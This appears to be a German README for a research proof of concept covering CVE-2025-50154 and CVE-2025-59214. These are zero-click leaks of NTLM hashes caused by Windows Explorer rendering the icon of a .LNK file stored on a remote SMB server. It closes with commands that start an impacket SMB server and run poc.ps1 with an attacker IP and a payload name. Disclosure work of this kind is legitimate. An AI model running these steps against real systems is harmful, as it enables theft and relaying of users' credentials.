
POCs für CVE-2025-50154 und CVE-2025-59214, Zero-Day-Schwachstellen im Windows-Datei-Explorer, die NTLMv2-SSP ohne Benutzerinteraktion offenlegen. Es handelt sich um einen Bypass für den Sicherheitspatch CVE-2025-24054.
Von Ruben Enkaoua und Cymulate
Erster Blog: Zero Click, One NTLM: Microsoft Security Patch Bypass (CVE-2025-50154)
Zweiter Blog: Zweimal gepatcht, weiterhin umgangen: Neues NTLM-Leak (CVE-2025-50154 Patch-Bypass)
Die ursprüngliche, kürzlich gepatchte Schwachstelle war eine 0-Click-NTLM-Hash-Offenlegung, die ausgelöst wurde, wenn explorer.exe das Icon einer .LNK-Verknüpfungsdatei rendert, deren Icon auf einem entfernten SMB-Server gehostet wurde.
Nach dem Patch lädt explorer.exe keine Icons mehr von entfernten SMB-Pfaden, wodurch die automatische Offenlegung von NTLM-Hashes verhindert wird.
Update: Der Patch für CVE-2025-50154 funktionierte überhaupt nicht. Wir haben ihn gemeldet, und der Schwachstelle wurde eine neue CVE zugewiesen: CVE-2025-59214. Der POC ist für beide CVEs relevant.
Durch Erstellen einer .LNK-Datei mit:
Der explorer.exe-Prozess ruft die entfernte Datei weiterhin ab, um das PE-Icon aus dessen RT_GROUP_ICON- und RT_ICON-Ressourcen zu extrahieren.

# put the binary (for example Taskmgr.exe) in the directory and run the SMB server.
impacket-smbserver share . -smb2support
# Replace the values with the path, the responder server IP and the file name on the server. Note: It can take 20 to 30 seconds.
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"